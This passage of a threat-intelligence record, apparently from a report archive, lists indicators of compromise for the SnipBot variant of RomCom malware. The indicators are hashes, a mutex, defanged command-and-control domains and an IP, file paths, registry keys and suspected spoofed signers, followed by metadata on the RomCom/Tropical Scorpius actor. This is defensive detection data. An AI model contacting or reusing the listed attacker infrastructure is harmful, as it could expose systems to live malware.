64-bit EXE\r\ne5812860a92edca97a2a04a3151d1247c066ed29ae6bbcf327d713fbad7e79e8 - 64-bit DLL\r\nf74ebf0506dc3aebc9ba6ca1e7460d9d84543d7dadb5e9912b86b843e8a5b671 - PDF document\r\nMutex\r\nSnipMutex\r\nAssociated Domains/IP addresses\r\nfastshare[.]click\r\ndocstorage[.]link\r\npublicshare[.]link\r\nxeontime[.]com\r\ndrvmcprotect[.]com\r\nmcprotect[.]cloud\r\ncethernet[.]com\r\nsitepanel[.]top\r\nilogicflow[.]com\r\nwebtimeapi[.]com\r\ndns-msn[.]com\r\ncertifysop[.]com\r\ndrv2ms[.]com\r\nolminx[.]com\r\nlinedrv[.]com\r\nadobe.cloudcreative[.]digital\r\n1drv.fileshare[.]direct\r\n91.92.250[.]104\r\nDirectory paths\r\n%LOCALAPPDATA%\\KeyStore\r\n%LOCALAPPDATA%\\DataCache\r\n%LOCALAPPDATA%\\AppTemp\r\nRegistry 
Keys\r\nHKCU\\SOFTWARE\\AppDataSoft\r\nHKCU\\SOFTWARE\\AppDataHigh\r\nCode Signers (Possibly Spoofed)\r\nCC Byg og Udlejning ApS\r\nCOSMART LLC\r\nKHAROS LLC\r\nHangzhou Yueju Apparel Co., Ltd.\r\nARION LLC\r\nSource: https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/"
	],
	"report_names": [
		"snipbot-romcom-malware-variant"
	],
	"threat_actors": [
		{
			"id": "555e2cac-931d-4ad4-8eaa-64df6451059d",
			"created_at": "2023-01-06T13:46:39.48103Z",
			"updated_at": "2026-04-10T02:00:03.342729Z",
			"deleted_at": null,
			"main_name": "RomCom",
			"aliases": [
				"UAT-5647",
				"Storm-0978"
			],
			"source_name": "MISPGALAXY:RomCom",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d58052ba-978b-4775-985a-26ed8e64f98c",
			"created_at": "2023-09-07T02:02:48.069895Z",
			"updated_at": "2026-04-10T02:00:04.946879Z",
			"deleted_at": null,
			"main_name": "Tropical Scorpius",
			"aliases": [
				"DEV-0978",
				"RomCom",
				"Storm-0671",
				"Storm-0978",
				"TA829",
				"Tropical Scorpius",
				"UAC-0180",
				"UNC2596",
				"Void Rabisu"
			],
			"source_name": "ETDA:Tropical Scorpius",
			"tools": [
				"COLDDRAW",
				"Cuba",
				"Industrial Spy",
				"PEAPOD",
				"ROMCOM",
				"ROMCOM RAT",
				"SingleCamper",
				"SnipBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434724,
	"ts_updated_at": 1775826698,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/353219416037a7d696f24672037c80518463ac24.pdf",
		"text": "https://archive.orkl.eu/353219416037a7d696f24672037c80518463ac24.txt",
		"img": "https://archive.orkl.eu/353219416037a7d696f24672037c80518463ac24.jpg"
	}
}